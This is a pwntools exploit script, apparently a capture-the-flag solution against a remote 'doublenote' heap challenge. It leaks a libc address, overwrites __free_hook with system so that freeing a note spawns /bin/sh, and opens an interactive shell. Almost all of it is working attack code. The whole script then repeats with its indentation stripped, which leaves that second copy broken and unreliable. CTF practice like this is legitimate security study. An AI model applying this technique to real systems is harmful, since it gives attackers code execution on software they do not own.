hkraw/doublenoteapp_expl.py

## doublenoteapp_expl.py
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from math import gamma
import subprocess
import random

#Utils
def createnote(size):
	io.sendlineafter('>> ','1')
	io.sendlineafter('note:\n',f'{size}')

def edit(index,numbers):
	io.sendlineafter('>> ','3')
	io.sendlineafter('edit:\n',f'{index}')
	for i in range(len(numbers)):
		io.sendlineafter(': ',f'{numbers[i]}')
		if i==len(numbers)-1: io.sendlineafter('n)\n','n')
		else: io.sendlineafter('n)\n','y')

def itof(val):
	file = open('f.js','wb')
	f = b'''
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val) {
	    f64_buf[0] = val;
	    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	}

	function itof(val) {
	    u64_buf[0] = Number(val & 0xffffffffn);
	    u64_buf[1] = Number(val >> 32n);
	    return f64_buf[0];
	}
	'''
	f += f'\nconsole.log(itof({val}n));'.encode()
	file.write(f)
	file.close()
	d = subprocess.check_output(['./d8','f.js']).strip()
	return d.decode()

def ftoi(val):
	file = open('i.js','wb')
	f = b'''
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val) {
	    f64_buf[0] = val;
	    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	}

	function itof(val) {
	    u64_buf[0] = Number(val & 0xffffffffn);
	    u64_buf[1] = Number(val >> 32n);
	    return f64_buf[0];
	}
	'''
	f += f'\nconsole.log(ftoi({val}));'.encode()
	file.write(f)
	file.close()
	d = subprocess.check_output(['./d8','i.js']).strip()
	return d.decode()

def view(idx):
	io.sendlineafter('>> ','2')
	io.sendlineafter('view:\n',f'{idx}')
	return io.recvuntil('Choose your option:\n').strip()

def swap(idx,n1,n2):
	io.sendlineafter('>> ','5')
	io.sendlineafter('in:\n',f'{idx}')
	io.sendlineafter('swap:\n',f'{n1}')
	io.sendlineafter('with:\n',f'{n2}')

def delete(idx):
	io.sendlineafter('>> ','4')
	io.sendlineafter('delete:\n',f'{idx}')

#libc 2.27
libc = ELF('./libc-2.27.so',checksec=False)
main_arena = 0x3ebc40
system = 0x4f4e0
__free_hook = 0x3ed8e8

#Struct
''' |	  |	| 	|	|
---------------------------------
0x10|	size	|   numread	|
0x18|*doublenote|	-	|
'''

if __name__ == '__main__':
#	io = process('./D',env={'LD_PRELOAD':libc.path})
	io = remote('host1.metaproblems.com',5820)

	createnote(0x418//8) #0
	createnote(0x18//8) #1
	createnote(0x18//8) #2

	edit(1,[itof(0x1337)])
	edit(0,[itof(0x461)])
	swap(0,1,0)
	delete(0)
	createnote(0x438//8)
	libc_leak = int(ftoi(view(1).split(b': ')[1].split(b'\n')[0].decode()),0)
	libc_base = libc_leak - main_arena - 0x60
	print(hex(libc_base))

	delete(0)
	createnote(0x458//8) #0
	l = []
	for i in range(0x418//8):
		l.append(0x2f62696e2f7368)
	l.append(itof(0x21))
	l.append(itof(0x0000000000000003))
	l.append(itof(libc_base+__free_hook-0x8))
	edit(0,l)
	edit(1,[itof(0x68732f6e69622f),itof(libc_base+system)])

	delete(1)
	io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from past.builtins import xrange
	from time import sleep
	from math import gamma
	import subprocess
	import random

	#Utils
	def createnote(size):
	io.sendlineafter('>> ','1')
	io.sendlineafter('note:\n',f'{size}')

	def edit(index,numbers):
	io.sendlineafter('>> ','3')
	io.sendlineafter('edit:\n',f'{index}')
	for i in range(len(numbers)):
	io.sendlineafter(': ',f'{numbers[i]}')
	if i==len(numbers)-1: io.sendlineafter('n)\n','n')
	else: io.sendlineafter('n)\n','y')

	def itof(val):
	file = open('f.js','wb')
	f = b'''
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val) {
	f64_buf[0] = val;
	return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	}

	function itof(val) {
	u64_buf[0] = Number(val & 0xffffffffn);
	u64_buf[1] = Number(val >> 32n);
	return f64_buf[0];
	}
	'''
	f += f'\nconsole.log(itof({val}n));'.encode()
	file.write(f)
	file.close()
	d = subprocess.check_output(['./d8','f.js']).strip()
	return d.decode()

	def ftoi(val):
	file = open('i.js','wb')
	f = b'''
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val) {
	f64_buf[0] = val;
	return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	}

	function itof(val) {
	u64_buf[0] = Number(val & 0xffffffffn);
	u64_buf[1] = Number(val >> 32n);
	return f64_buf[0];
	}
	'''
	f += f'\nconsole.log(ftoi({val}));'.encode()
	file.write(f)
	file.close()
	d = subprocess.check_output(['./d8','i.js']).strip()
	return d.decode()

	def view(idx):
	io.sendlineafter('>> ','2')
	io.sendlineafter('view:\n',f'{idx}')
	return io.recvuntil('Choose your option:\n').strip()

	def swap(idx,n1,n2):
	io.sendlineafter('>> ','5')
	io.sendlineafter('in:\n',f'{idx}')
	io.sendlineafter('swap:\n',f'{n1}')
	io.sendlineafter('with:\n',f'{n2}')

	def delete(idx):
	io.sendlineafter('>> ','4')
	io.sendlineafter('delete:\n',f'{idx}')

	#libc 2.27
	libc = ELF('./libc-2.27.so',checksec=False)
	main_arena = 0x3ebc40
	system = 0x4f4e0
	__free_hook = 0x3ed8e8

	#Struct
	''' \| \| \| \| \|
	---------------------------------
	0x10\| size \| numread \|
	0x18\|*doublenote\| - \|
	'''

	if __name__ == '__main__':
	# io = process('./D',env={'LD_PRELOAD':libc.path})
	io = remote('host1.metaproblems.com',5820)

	createnote(0x418//8) #0
	createnote(0x18//8) #1
	createnote(0x18//8) #2

	edit(1,[itof(0x1337)])
	edit(0,[itof(0x461)])
	swap(0,1,0)
	delete(0)
	createnote(0x438//8)
	libc_leak = int(ftoi(view(1).split(b': ')[1].split(b'\n')[0].decode()),0)
	libc_base = libc_leak - main_arena - 0x60
	print(hex(libc_base))

	delete(0)
	createnote(0x458//8) #0
	l = []
	for i in range(0x418//8):
	l.append(0x2f62696e2f7368)
	l.append(itof(0x21))
	l.append(itof(0x0000000000000003))
	l.append(itof(libc_base+__free_hook-0x8))
	edit(0,l)
	edit(1,[itof(0x68732f6e69622f),itof(libc_base+system)])

	delete(1)
	io.interactive()